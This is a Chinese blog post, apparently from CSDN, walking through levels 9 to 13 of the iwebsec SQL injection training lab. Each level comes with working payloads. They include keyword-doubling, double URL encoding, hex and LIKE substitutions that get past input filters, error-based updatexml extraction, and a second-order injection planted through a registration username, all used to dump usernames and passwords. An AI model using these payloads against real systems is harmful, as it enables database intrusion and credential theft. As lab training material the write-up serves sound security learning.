iwebsec靶场通关sql注入详解

于 2024-07-12 16:24:49 发布
阅读量1k 收藏 17
点赞数 11
分类专栏: web安全 文章标签: 网络安全 web安全 sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51090949/article/details/140381430
版权

iwebsec靶场Sql注入9-13关

第九关-双写关键字绕过

1.测试有无注入点

打开iwebsec靶场第九关

在搜索栏的id=1后加上单引号看其是否会报错

报错了,证明其后台代码并没有对其进行完全的参数检查和严格的约束。导致前台可以控制其参数,从而直接查询数据库。既然报错了那这个就是个注入点。

2.构造payload

①查看后台选择字段数

看到页面如图显示,是个get基于id的get请求,基于id的不用构造闭合,测试一下order by查看选择了几个字段。

3是可以直接输出内容的证明有3个,输入4的时候,报错了,则判断选择的字段有3个.

②利用union联合查询判断显示位

我们输入了正常联合查询语法,但是报错了,就要考虑是否是关键字过滤了

查看源码

看源码,发现是select关键字被过滤了,因为整个select会被空格替代,我们把select分开写到select的两侧,过滤后成为一个select

输出之后,发现页面正常显示,证明payload正确

3.爆破数据

因为用联合查询有limit的限制,我们用显错注入爆破数据

①爆数据库名

payload:id=1 and updatexml(1,concat(0x7e,database()),2)

②爆表名

payload:?id=-1 union seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

③爆字段名

payload:?id=-1 union seselectlect 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

④爆数据

payload:?id=-1 union seselectlect 1,2,group_concat(concat(0x7e,username,password)) from iwebsec.user#

第十关:双重url编码绕过

1.测试有无注入点

在搜索栏里id=1后加上单引号,查看是否报错

语法报错了,证明其后台代码并没有对其进行完全的参数检查和严格的约束。导致前台可以控制其参数,从而直接查询数据库。既然报错了那这个就是个注入点。

2.构造payload

①使用order by 查询选择的字段数

输入3的时候正常回显,输入4的时候报错,证明选择了3个字段

②使用联合查询查看回显位置

输入union selecrt 1,2,3# 发现不是语法报错而是error,证明没有过滤,而是服务器没有识别我们的参数。

③查看源码

查看源码,发现第一层过滤了select,第二层对id进行了解码,所以我们把payload进行编码

④制造payload

id=-1 union select 1,2,database()# 对其进行两次url编码然后放入搜随栏

最终payload:

?id=-1 %25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35%25%32%38%25%32%39%25%32%33

3.爆破数据

①爆数据库

使用的payload:?id=-1 union select 1,2,database()#

编码后payload: ?id=-1 %25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35%25%32%38%25%32%39%25%32%33

②爆表

使用的payload:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'#

编码后:?id=-1 %25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%36%37%25%37%32%25%36%66%25%37%35%25%37%30%25%35%66%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%35%66%25%36%65%25%36%31%25%36%64%25%36%35%25%32%39%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%32%30%25%37%37%25%36%38%25%36%35%25%37%32%25%36%35%25%32%30%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%33%64%25%32%37%25%36%39%25%37%37%25%36%35%25%36%32%25%37%33%25%36%35%25%36%33%25%32%37%25%32%33

③爆字段

使用的payload:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

编码后:?id=-1 %25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%36%37%25%37%32%25%36%66%25%37%35%25%37%30%25%35%66%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%36%33%25%36%66%25%36%63%25%37%35%25%36%64%25%36%65%25%35%66%25%36%65%25%36%31%25%36%64%25%36%35%25%32%39%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%36%33%25%36%66%25%36%63%25%37%35%25%36%64%25%36%65%25%37%33%25%32%30%25%37%37%25%36%38%25%36%35%25%37%32%25%36%35%25%32%30%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%35%66%25%36%65%25%36%31%25%36%64%25%36%35%25%33%64%25%32%37%25%37%35%25%37%33%25%36%35%25%37%32%25%37%33%25%32%37%25%32%33

④爆数据

使用的payload:?id=-1 union select 1,2,group_concat(concat(0x7e,username,password)) from iwebsec.user#

编码后:?id=-1 %25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%36%37%25%37%32%25%36%66%25%37%35%25%37%30%25%35%66%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%32%63%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%32%39%25%32%39%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%37%37%25%36%35%25%36%32%25%37%33%25%36%35%25%36%33%25%32%65%25%37%35%25%37%33%25%36%35%25%37%32%25%32%33

第十一关:十六进制绕过

1.测试有无注入点

打开关卡,看到是id搜索,在id=1后加上单引号,查看是否报错

法报错了,证明其后台代码并没有对其进行完全的参数检查和严格的约束。导致前台可以控制其参数,从而直接查询数据库。既然报错了那这个就是个注入点。

2.构造payload

①用order by查看选择的字段数

输入3的时候可以回显

输入4时候语法报错,证明选择字段数是3

②用联合查询,查看回显位

③查看源码

可以看到依然是对id进行了urldecode编码

3.爆破数据

①爆破数据库

使用的payload:?id=-1 union select 1,2,database()#

②爆破表名

使用的payload:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563# 0x69776562736563是iwebsec的十六进制编码

③爆破字段

使用的payload:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x75736572# 0x75736572是users的十六进制编码

④爆破数据

使用的payload:?id=-1 union select 1,2,group_concat(concat(0x7e,username,password)) from iwebsec.user#

第十二关:等价函数替换过滤

1.测试有无注入点

打开关卡,看到是id搜索,在id=1后加上单引号,查看是否语法报错

法报错了,证明其后台代码并没有对其进行完全的参数检查和严格的约束。导致前台可以控制其参数,从而直接查询数据库。既然报错了那这个就是个注入点。

2.构造payload

①使用order by查看选择的字段数

输入3时正常回显,输入4时报错,证明是选择了3个字段

②使用联合查询查看,回显的位置

使用union select 1,2,3#查看

③查看源码

可以看到=被过滤掉了,我们可以用等价函数去代替=,因为sql里面的like 不加通配符和=效果一样,所以我们用like去平替

④构造payload

?id=-1 union select 1,2,database()#

3.爆破数据

①爆破数据库

使用的payload:?id=-1 union select 1,2,database()#

②爆破表

使用的payload:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like 0x69776562736563--+ 0x69776562736563是iwebsec的十六进制编码

③爆破字段

使用的payload:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name like 0x75736572--+ 0x75736572是users的十六进制编码

④爆破数据

使用的payload:?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from iwebsec.user--+

第十三关:MySQL二次注入

1.测试有无注入点

打开关卡,看到还是id,在id后加上单引号,查看是否有注入点

发现页面没有报错,输入双引号等也都没有反应,则注册这块可能没有注入点,我们点开找回密码试试

好像也没什么可以查看到的,直接查看源码

可以看到注册界面没什么可以注入的,但是根据邮件找回的时候,会查找对应的用户明,可以在注册的时候用户名写入payload,然后查找的时候用户名会形成一个payload然后执行回显。

2.构造payload

因为不是数字和字符型,我们直接用显错注入

①将payload当作用户名 密码和邮箱随便填

②注册完后用邮箱,使其对应的payload执行

3.爆破数据

①爆破数据库

使用的payload: 1'or updatexml(1,concat(0x7e,database()),2) #

②爆破表

使用的payload:1' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) #

③爆破字段

使用的payload:1' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) #

④爆破数据

使用的payload:1' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,';',password)) from iwebsec.users),1,31),0x7e),1) #

究其本
关注
  • 11
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3852
sqli靶场SqliLabs 是一个学习 SQL 注入的靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
SQL注入--靶场练习
wmr123456001的博客
02-11 2045
SQL注入靶场练习
SQL注入-靶场通关 Less 1-21
最新发布
weixin_72104324的博客
07-03 1012
打开Burp工具--打开内嵌浏览器--进入靶场第六关--打开拦截--输入?id=1',如果是正确的,说明不存在注入点,如果错误,说明存在注入点,这里是错误的,需要加上注释--+,在回车看结果是正确的,说明找到了注入点。工具,打开内嵌浏览器,打开拦截,输入http://127.0.0.1/sqli-labs-master/Less-9,然后发送到。id=1'--+,后面都注释了,单引号不闭合,报错说明是数字型SQL注入。设置休眠时间为10s,如果执行SQL语句就会加载,说明正确,存在注入点。
sql注入靶场_sql注入
weixin_26705651的博客
09-21 937
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
sql注入——pikachu靶场
cjh12340826的博客
07-20 645
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
iwebsec靶场sql注入
果粒程
02-24 983
iwebsec靶场sql注入
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
sql靶场通关8-10
09-24
sql靶场8-10详解
sql注入#sql靶场
11-02
SQL靶场通常是指用于安全培训、测试和研究SQL注入攻击的环境,它可以帮助开发者和安全人员了解SQL注入的危害,学习如何防御这种攻击。 在SQL注入中,攻击者通过在网页表单、URL参数或其他用户输入点输入特定的SQL...
sqllib靶场1-5通关详解
09-24
详细记载了sqllib靶场1-5的通关
Pikachu靶场sql注入通关
oiadkt的博客
03-07 5008
pickchu—sql注入通关
sql注入靶场实操
weixin_45711977的博客
06-23 3450
sql注入靶场实操
sql注入靶场通关
xiaoyang0475的博客
07-03 941
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入点?id=1查看是否存在注入点确定存在注入点将后面进行注释查看页面回显页面回显正常判断注入方式为字符型注入。
sql注入靶场入门一
cracker_c博客
10-25 1165
拿到url进入靶场 登录页面 首先肯定从最低级开始在登陆页面进行注入,然后发现登录页面没有注入点。发现登录按钮下面有通知一栏,意味着可能存在注入点,拿到url:http://219.153.49.228:41247/new_list.php?id=1 判断存在注入点,上sqlmap爆破,终于拿到数据库列表 查表 发现有三个字段名,直接查用户名和密码 出来md5值,百度在线...
sql注入靶场
weixin_44382333的博客
09-22 147
盲注: updatexml()函数的理解(图床的设置)
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5768
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
SQL注入(php靶场为例)
qq_47632786的博客
02-07 419
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
搭建sql注入靶场
学无止境
05-07 4614
搭建sqli-labs SQL-LABs定义:是一个专业的sql注入练习平台, 适用于GET和POST场景, 第一步:准备工作: 1)安装php版本php5.4 选择指定版本 然后点击“安装” 第二步:下载sqli-labs 并解压 <<sqli-labs-master.zip>> 第三步:将sqli-lab文件 放到www目录下...
pikachu靶场通关sql注入
08-10
在Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字型注入、字符型注入、搜索型注入、XX型注入、insert注入、delete注入、http header注入、盲注和宽字节注入等。你也可以使用Python脚本来进行注入测试,根据注入类型和目标网址构造合适的payload来发送请求。123 #### 引用[.reference_title] - *1* [Pikachu靶场sql注入通关](https://blog.csdn.net/oiadkt/article/details/129385178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [pikachu靶场通关sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值